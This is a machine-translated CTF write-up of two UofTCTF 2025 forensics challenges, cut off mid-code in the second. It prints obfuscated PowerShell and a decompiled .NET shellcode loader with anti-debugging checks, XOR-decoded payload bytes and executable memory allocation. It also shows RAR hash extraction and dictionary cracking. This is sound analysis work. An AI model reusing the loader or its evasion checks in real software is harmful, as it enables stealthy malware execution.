{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-uoftctf-2025-en","result":{"data":{"markdownRemark":{"id":"a91221cf-6126-5748-930a-6e2dbb5f00f6","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-uoftctf-2025\">original page</a>.</p>\n</blockquote>\n<p>We participated in UoTCTF 2025 as 0nePadding and placed 43rd out of 897 teams. (Though I personally didn’t solve many challenges this time.)</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9d656f16e15262dcb20ff0090230384c/7bf07/image-20250113211514744.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.916666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeklEQVQY05WQSw7DIAwFuf9NGzA/mygBpFdwS7sNixHYetgjTIgR1idFRMADecDKMTOIaJyfu5FSIOeNu1a01rap411KCfVbGyKPF0W4sGe4yJlxWKt201INfT6Ry4Xe+5bdzE/DOXT1jA8BB8X/H+qmh6hhhnPu13sDRRKDGBi4RLAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9d656f16e15262dcb20ff0090230384c/8ac56/image-20250113211514744.webp 240w,\n/static/9d656f16e15262dcb20ff0090230384c/d3be9/image-20250113211514744.webp 480w,\n/static/9d656f16e15262dcb20ff0090230384c/e46b2/image-20250113211514744.webp 960w,\n/static/9d656f16e15262dcb20ff0090230384c/d9e4a/image-20250113211514744.webp 1128w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9d656f16e15262dcb20ff0090230384c/8ff5a/image-20250113211514744.png 
240w,\n/static/9d656f16e15262dcb20ff0090230384c/e85cb/image-20250113211514744.png 480w,\n/static/9d656f16e15262dcb20ff0090230384c/d9199/image-20250113211514744.png 960w,\n/static/9d656f16e15262dcb20ff0090230384c/7bf07/image-20250113211514744.png 1128w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9d656f16e15262dcb20ff0090230384c/d9199/image-20250113211514744.png\"\n            alt=\"image-20250113211514744\"\n            title=\"image-20250113211514744\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Here is a brief writeup of the challenges I solved.</p>\n<h2 id=\"poofforensic\" style=\"position:relative;\"><a href=\"#poofforensic\" aria-label=\"poofforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Poof(Forensic)</h2>\n<blockquote>\n<p>Yet another pcap, no usb traffic in this one so I’m lost. Can you help me out? 
:)</p>\n</blockquote>\n<p>Analyzing the pcap file provided as the challenge binary revealed that suspicious PS1 files and other artifacts were being retrieved from a suspicious IP address.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 528px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3262554099361af9895df1c77d6a094a/4af8e/image-20250111212443760.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 55.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB2UlEQVQoz21S2ZKiQBDkWzwiRkXkRg51RFgRAV0c9cH//46cynKJ2Indh4qG7Doys9ow4xqu58H3PXieC9d19fQDX8/l0oRpDrH4T/zEjel0itnHB0ajkcZ4PMZkMgFxnj/xNzbkTMaTf+6MJElQVRXiOMZ2u0WWZQiCQIPYZrPFbrdDmiaiwtdgThRFWK9j7Pd7sAfxMAxhFEWJsjggFvD1euF2u0lBKnI9abbB/f7A4/FA2zQ4Ho84HA6o6xplWSLT+zsulw5FUbwbcpLjOOLVEt3loomOY6vk1WqFpmmlSQFzsdB/ekaGbdsJs1ibUA3r5/M5DMqyrCVm8vMl006nGlEYYDab6YL6/iZNG6xlcJKmWkxriOd5jvP5jK7r1AL6aaSa5Mt0WwvpZ3OmvEqY5TjKPws5fSEsOWj3+YlfosR1PdCy0+mkdljCUhgmQjuAbTt4Pp/qYSgsLMvSqc+HYMKGTDhw8K/vf8uiMhm2VysG24ws26gcS8C+79V827bfkmUxbHa9XsWzVu5a/a6EzUX8zve5LC5T9sNbVYaD5E6KyMSVaUzipunPIIlR/bGAGBnyOdEKslOGUbTWwsFDJnLLQ0Myq2VR2kx85T3fHk8+K27674bftjJwf+s9EQAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3262554099361af9895df1c77d6a094a/8ac56/image-20250111212443760.webp 240w,\n/static/3262554099361af9895df1c77d6a094a/d3be9/image-20250111212443760.webp 480w,\n/static/3262554099361af9895df1c77d6a094a/83811/image-20250111212443760.webp 528w\"\n              sizes=\"(max-width: 528px) 100vw, 528px\"\n              type=\"image/webp\"\n            />\n          
<source\n            srcset=\"/static/3262554099361af9895df1c77d6a094a/8ff5a/image-20250111212443760.png 240w,\n/static/3262554099361af9895df1c77d6a094a/e85cb/image-20250111212443760.png 480w,\n/static/3262554099361af9895df1c77d6a094a/4af8e/image-20250111212443760.png 528w\"\n            sizes=\"(max-width: 528px) 100vw, 528px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3262554099361af9895df1c77d6a094a/4af8e/image-20250111212443760.png\"\n            alt=\"image-20250111212443760\"\n            title=\"image-20250111212443760\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This file appeared to be one that executes an obfuscated PowerShell script.</p>\n<p>After deobfuscating the first few lines, it became apparent that variables named Key and IV were being defined.</p>\n<div class=\"gatsby-highlight\" data-language=\"key\"><pre class=\"language-key\"><code class=\"language-key\"># Key\n.(&quot;{1}{0}{2}&quot; -f &#39;-Va&#39;,&#39;Set&#39;,&#39;riable&#39;) -Name (&quot;{0}{1}&quot; -f &#39;ke&#39;,&#39;y&#39;) -Value (  $Vs52aR::&quot;u`TF8&quot;.(&quot;{2}{0}{1}&quot; -f &#39;etBy&#39;,&#39;tes&#39;,&#39;G&#39;).Invoke(((&quot;{0}{2}{1}&quot;-f&#39;sk&#39;,&#39;89&#39;,&#39;sd&#39;)+&#39;D2G&#39;+(&quot;{0}{1}&quot;-f &#39;0X9&#39;,&#39;j&#39;)+(&quot;{1}{0}&quot; -f &#39;F&#39;,&#39;k2f&#39;)+(&quot;{0}{1}&quot;-f (&quot;{0}{1}&quot;-f&#39;1&#39;,&#39;b4S&#39;),&#39;2&#39;)+&#39;a7&#39;+(&quot;{1}{0}&quot;-f &#39;a&#39;,&#39;Gh8&#39;)+&#39;Vk0&#39;+&#39;L&#39;)))\n\n# IV\n.(&quot;{0}{2}{1}&quot;-f &#39;Set&#39;,&#39;Variable&#39;,&#39;-&#39;) -Name (&#39;iv&#39;) -Value ( ( VArIaBlE  (&quot;{0}{1}&quot;-f&#39;Y8&#39;,&#39;F&#39;)  -ValuEo )::&quot;U`Tf8&quot;.(&quot;{0}{2}{1}&quot;-f 
&#39;Get&#39;,&#39;tes&#39;,&#39;By&#39;).Invoke(((&quot;{1}{0}&quot; -f &#39;e&#39;,(&quot;{0}{1}&quot; -f &#39;Md3&#39;,&#39;3&#39;))+&#39;F&#39;+&#39;a&#39;+(&quot;{0}{2}{1}&quot; -f &#39;0&#39;,&#39;Z&#39;,(&quot;{0}{1}&quot;-f &#39;wN&#39;,&#39;x2&#39;))+&#39;q&#39;+(&quot;{3}{2}{1}{0}&quot;-f&#39;Y1&#39;,(&quot;{1}{2}{0}&quot;-f&#39;m&#39;,&#39;7oN&#39;,&#39;45&#39;),(&quot;{1}{0}{2}&quot; -f &#39;6&#39;,&#39;LjK&#39;,&#39;X9t3G&#39;),&#39;5&#39;))))</code></pre></div>\n<p>The Key and IV extracted from the obfuscated script were as follows.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 616px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7be3338b7c950a74be58bf0691135982/40040/image-20250111214114131.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 19.583333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA70lEQVQY0y3PyXLCMBBFUS8DHiQZMBiL0bM8IExMqFT+/7duVCGLVz0suk57+0xzPF85Vx1501GZgaLtycuayzUn05ptmhGfGlYuan9mk2pEkiF3R6JNyjo9uhyQhwpvGAbujxk7f3OfX9jHk9H19j5hx4G2rpBSEoSCUCgCf4nv+4SBTxC5fSTes5CEMsYr65baiYz9pOkt4/Rkmia66Yt+/qEeHuwPJ9b5jfjSE+80cXZlV97YlpZNYUmSBOnESpd4VdNSNYbaHSv+XzZdR2FGzPSiNDeEcLroLYxW278qEu3kCqlilFIsFwv85Qe/H5xsoKxzJD8AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7be3338b7c950a74be58bf0691135982/8ac56/image-20250111214114131.webp 240w,\n/static/7be3338b7c950a74be58bf0691135982/d3be9/image-20250111214114131.webp 480w,\n/static/7be3338b7c950a74be58bf0691135982/26c8a/image-20250111214114131.webp 616w\"\n              sizes=\"(max-width: 616px) 100vw, 616px\"\n              
type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7be3338b7c950a74be58bf0691135982/8ff5a/image-20250111214114131.png 240w,\n/static/7be3338b7c950a74be58bf0691135982/e85cb/image-20250111214114131.png 480w,\n/static/7be3338b7c950a74be58bf0691135982/40040/image-20250111214114131.png 616w\"\n            sizes=\"(max-width: 616px) 100vw, 616px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7be3338b7c950a74be58bf0691135982/40040/image-20250111214114131.png\"\n            alt=\"image-20250111214114131\"\n            title=\"image-20250111214114131\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Continuing to deobfuscate further revealed that a PE file was being obtained by decrypting a file containing a HEX string retrieved from the same IP address.</p>\n<p>Using the extracted Key and IV to decrypt the data, I was able to recover the suspicious PE file.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/45c501d3868fbf9f25518031f8551ecd/d4377/image-20250111214016245.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 26.25%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA30lEQVQY03WQ226DMBBE/f9/WCktFNsBxzZgfIGYy3QxjZqXrjQ6M7vSPCyr1SdaJ2Cjgg4dTFAw5E/e5AeEamCtxTiOl9wf3a8fhqHQOQf23d/ATQ3tWyps0U4c3ShLtumBtpeo6xpVVeGLdPKVT75LKQWm3B0+TXDzgCFapBzQBw09KixbQu8NpJQQQhTJuwTnHE3TlHx6Ia+dNgYs70+sx4p1z8jbs/CljfYxBXRdB+895pQQY0QM4eKbD8REd4b/5riwzDO81gj0x0g/ylS8TBMW8jsVHXTfSYVU+AOR4nvnEFtlKQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/45c501d3868fbf9f25518031f8551ecd/8ac56/image-20250111214016245.webp 240w,\n/static/45c501d3868fbf9f25518031f8551ecd/d3be9/image-20250111214016245.webp 480w,\n/static/45c501d3868fbf9f25518031f8551ecd/e46b2/image-20250111214016245.webp 960w,\n/static/45c501d3868fbf9f25518031f8551ecd/9447f/image-20250111214016245.webp 1294w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/45c501d3868fbf9f25518031f8551ecd/8ff5a/image-20250111214016245.png 240w,\n/static/45c501d3868fbf9f25518031f8551ecd/e85cb/image-20250111214016245.png 480w,\n/static/45c501d3868fbf9f25518031f8551ecd/d9199/image-20250111214016245.png 960w,\n/static/45c501d3868fbf9f25518031f8551ecd/d4377/image-20250111214016245.png 1294w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/45c501d3868fbf9f25518031f8551ecd/d9199/image-20250111214016245.png\"\n            alt=\"image-20250111214016245\"\n            title=\"image-20250111214016245\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Since this file appeared to be a .NET PE file, I proceeded to analyze it with 
ILSpy.</p>\n<p>However, for some reason, ILSpy was unable to analyze parts of the code.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 917px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/aded1ce129c194d4a7c9a5b8482b5660/59000/image-20250111215117312.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 64.16666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/aded1ce129c194d4a7c9a5b8482b5660/8ac56/image-20250111215117312.webp 240w,\n/static/aded1ce129c194d4a7c9a5b8482b5660/d3be9/image-20250111215117312.webp 480w,\n/static/aded1ce129c194d4a7c9a5b8482b5660/f91b9/image-20250111215117312.webp 917w\"\n              sizes=\"(max-width: 917px) 100vw, 917px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/aded1ce129c194d4a7c9a5b8482b5660/8ff5a/image-20250111215117312.png 240w,\n/static/aded1ce129c194d4a7c9a5b8482b5660/e85cb/image-20250111215117312.png 480w,\n/static/aded1ce129c194d4a7c9a5b8482b5660/59000/image-20250111215117312.png 917w\"\n            sizes=\"(max-width: 917px) 100vw, 917px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/aded1ce129c194d4a7c9a5b8482b5660/59000/image-20250111215117312.png\"\n            alt=\"image-20250111215117312\"\n            title=\"image-20250111215117312\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        
</picture>\n  </a>\n    </span></p>\n<p>So I tried using dnSpy instead, which allowed me to view the decompiled results of the challenge binary as shown below. (The reason ILSpy failed to analyze it is unclear.)</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 749px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d89e28be9534d69bc1b5d2bb2c65b65f/5bb8b/image-20250111215050507.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 108.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d89e28be9534d69bc1b5d2bb2c65b65f/8ac56/image-20250111215050507.webp 240w,\n/static/d89e28be9534d69bc1b5d2bb2c65b65f/d3be9/image-20250111215050507.webp 480w,\n/static/d89e28be9534d69bc1b5d2bb2c65b65f/71afc/image-20250111215050507.webp 749w\"\n              sizes=\"(max-width: 749px) 100vw, 749px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d89e28be9534d69bc1b5d2bb2c65b65f/8ff5a/image-20250111215050507.png 240w,\n/static/d89e28be9534d69bc1b5d2bb2c65b65f/e85cb/image-20250111215050507.png 480w,\n/static/d89e28be9534d69bc1b5d2bb2c65b65f/5bb8b/image-20250111215050507.png 749w\"\n            sizes=\"(max-width: 749px) 100vw, 749px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d89e28be9534d69bc1b5d2bb2c65b65f/5bb8b/image-20250111215050507.png\"\n            alt=\"image-20250111215050507\"\n            title=\"image-20250111215050507\"\n            loading=\"lazy\"\n      
      style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at this code, it simply XORs a hardcoded byte array to decrypt some data.</p>\n<div class=\"gatsby-highlight\" data-language=\"c#\"><pre class=\"language-c#\"><code class=\"language-c#\">using System;\nusing System.Diagnostics;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\nnamespace Kljansdfkansdf\n{\n// Token: 0x02000003 RID: 3\n[NullableContext(1)]\n[Nullable(0)]\npublic class Kljansdfkansdf\n{\n// Token: 0x06000009 RID: 9 RVA: 0x00002080 File Offset: 0x00000280\npublic static void kjfadsiewqinfqniowf(byte[] ncuasdhif)\n{\nuint num = Win32.VirtualAlloc(0U, (uint)ncuasdhif.Length, Win32.MEM_COMMIT, Win32.PAGE_READWRITE);\nMarshal.Copy(ncuasdhif, 0, (IntPtr)((UIntPtr)num), ncuasdhif.Length);\nuint num2;\nWin32.VirtualProtect((IntPtr)((UIntPtr)num), (UIntPtr)((IntPtr)ncuasdhif.Length), Win32.PAGE_EXECUTE_READ, out num2);\nIntPtr zero = IntPtr.Zero;\nuint num3 = 0U;\nIntPtr zero2 = IntPtr.Zero;\nWin32.WaitForSingleObject(Win32.CreateThread(0U, 0U, num, zero2, 0U, ref num3), uint.MaxValue);\n}\n\n// Token: 0x0600000A RID: 10 RVA: 0x000020E4 File Offset: 0x000002E4\nprivate static void Main(string[] args)\n{\nWin32.ShowWindow(Win32.GetConsoleWindow(), Win32.SW_HIDE);\nif (Debugger.IsAttached)\n{\nEnvironment.Exit(0);\n}\nforeach (Process process in Process.GetProcesses())\n{\nif (process.ProcessName.Contains(&quot;devenv&quot;) || process.ProcessName.Contains(&quot;dnspy&quot;))\n{\nEnvironment.Exit(0);\n}\n}\nbyte[] array = new byte[]\n{\n129, 149, byte.MaxValue, 125, 125, 125, 29, 244, 152, 76,\n189, 25, 246, 45, 77, 246, 47, 113, 246, 47,\n105, 246, 15, 85, 114, 202, 55, 91, 76, 130,\n209, 65, 28, 1, 127, 81, 93, 188, 178, 112,\n124, 186, 159, 143, 47, 42, 246, 47, 109, 246,\n55, 65, 246, 49, 108, 5, 158, 53, 124, 172,\n44, 246, 36, 93, 124, 174, 246, 52, 101, 
158,\n71, 52, 246, 73, 246, 124, 171, 76, 130, 209,\n188, 178, 112, 124, 186, 69, 157, 8, 139, 126,\n0, 133, 70, 0, 89, 8, 153, 37, 246, 37,\n89, 124, 174, 27, 246, 113, 54, 246, 37, 97,\n124, 174, 246, 121, 246, 124, 173, 244, 57, 89,\n89, 38, 38, 28, 36, 39, 44, 130, 157, 34,\n34, 39, 246, 111, 150, 240, 32, 23, 124, 240,\n248, 207, 125, 125, 125, 45, 21, 76, 246, 18,\n250, 130, 168, 198, 141, 200, 223, 43, 21, 219,\n232, 192, 224, 130, 168, 65, 123, 1, 119, 253,\n134, 157, 8, 120, 198, 58, 110, 15, 18, 23,\n125, 46, 130, 168, 30, 16, 25, 93, 82, 30,\n93, 19, 24, 9, 93, 8, 14, 24, 15, 93,\n17, 24, 26, 20, 9, 8, 14, 24, 15, 93,\n8, 18, 27, 9, 30, 9, 27, 6, 42, 73,\n14, 34, 76, 41, 34, 47, 78, 28, 17, 17,\n4, 34, 28, 51, 34, 52, 16, 13, 17, 73,\n19, 9, 66, 66, 0, 93, 82, 28, 25, 25,\n93, 82, 4, 125\n};\nbyte b = 125;\nfor (int j = 0; j &lt; array.Length; j++)\n{\nbyte[] array2 = array;\nint num = j;\narray2[num] ^= b;\n}\nKljansdfkansdf.kjfadsiewqinfqniowf(array);\n}\n}\n}</code></pre></div>\n<p>By XOR-decrypting this byte array with 125, it was possible to identify the correct flag.</p>\n<h2 id=\"decrypt-meforensic\" style=\"position:relative;\"><a href=\"#decrypt-meforensic\" aria-label=\"decrypt meforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Decrypt Me(Forensic)</h2>\n<blockquote>\n<p>I encrypted my encryption script, but I forgot the password. 
Can you help me decrypt it?</p>\n</blockquote>\n<p>Analyzing the encrypted RAR file provided as the challenge binary with rar2hashcat yielded the following hashes. (rar2john also works.)</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">./rar2hashcat flag.rar\n\n<span class=\"token variable\">$rar5</span><span class=\"token variable\">$16</span><span class=\"token variable\">$1d7cb8859a6c3c8e30a9db7a501811ac</span><span class=\"token variable\">$15</span><span class=\"token variable\">$280234db9d29c6ab216b74e6a89ec226</span><span class=\"token variable\">$8</span><span class=\"token variable\">$d12d4ba211b9c642</span>\n<span class=\"token variable\">$rar5</span><span class=\"token variable\">$16</span><span class=\"token variable\">$1d7cb8859a6c3c8e30a9db7a501811ac</span><span class=\"token variable\">$15</span><span class=\"token variable\">$7d06143b1a7dab3327b3ef1e41ad881a</span><span class=\"token variable\">$8</span><span class=\"token variable\">$d12d4ba211b9c642</span></code></pre></div>\n<p>Reference: <a href=\"https://github.com/hashstation/rar2hashcat/releases/tag/1.0\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Release rar2hashcat 1.0 · hashstation/rar2hashcat · GitHub</a></p>\n<p>Cracking this hash with rockyou.txt revealed the decompression password.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 878px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/68c790819b9c00f0b637596b4bcd101f/94829/image-20250112214205715.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 51.25000000000001%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/68c790819b9c00f0b637596b4bcd101f/8ac56/image-20250112214205715.webp 240w,\n/static/68c790819b9c00f0b637596b4bcd101f/d3be9/image-20250112214205715.webp 480w,\n/static/68c790819b9c00f0b637596b4bcd101f/6749f/image-20250112214205715.webp 878w\"\n              sizes=\"(max-width: 878px) 100vw, 878px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/68c790819b9c00f0b637596b4bcd101f/8ff5a/image-20250112214205715.png 240w,\n/static/68c790819b9c00f0b637596b4bcd101f/e85cb/image-20250112214205715.png 480w,\n/static/68c790819b9c00f0b637596b4bcd101f/94829/image-20250112214205715.png 878w\"\n            sizes=\"(max-width: 878px) 100vw, 878px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/68c790819b9c00f0b637596b4bcd101f/94829/image-20250112214205715.png\"\n            alt=\"image-20250112214205715\"\n            title=\"image-20250112214205715\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>With this, I was able to decompress the encrypted RAR file and extract a file called flag.py.</p>\n<p>This flag.py appears to encrypt the flag with AES and save it as flag.enc.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Cipher <span class=\"token keyword\">import</span> AES\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>Padding <span 
class=\"token keyword\">import</span> pad\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Hash <span class=\"token keyword\">import</span> SHA256\n<span class=\"token keyword\">from</span> time <span class=\"token keyword\">import</span> time\n<span class=\"token keyword\">import</span> random\nrandom<span class=\"token punctuation\">.</span>seed<span class=\"token punctuation\">(</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>time<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\nKEY <span class=\"token operator\">=</span> SHA256<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>random<span class=\"token punctuation\">.</span>getrandbits<span class=\"token punctuation\">(</span><span class=\"token number\">256</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>digest<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nFLAG <span class=\"token operator\">=</span> <span class=\"token string\">\"uoftctf{fake_flag}\"</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">encrypt_flag</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">,</span> key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    cipher <span class=\"token operator\">=</span> AES<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span>key<span class=\"token 
punctuation\">,</span> AES<span class=\"token punctuation\">.</span>MODE_EAX<span class=\"token punctuation\">)</span>\n    ciphertext<span class=\"token punctuation\">,</span> tag <span class=\"token operator\">=</span> cipher<span class=\"token punctuation\">.</span>encrypt_and_digest<span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">return</span> cipher<span class=\"token punctuation\">.</span>nonce <span class=\"token operator\">+</span> ciphertext\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    encrypted_flag <span class=\"token operator\">=</span> encrypt_flag<span class=\"token punctuation\">(</span>FLAG<span class=\"token punctuation\">,</span> KEY<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"flag.enc\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n        f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>encrypted_flag<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">if</span> __name__ 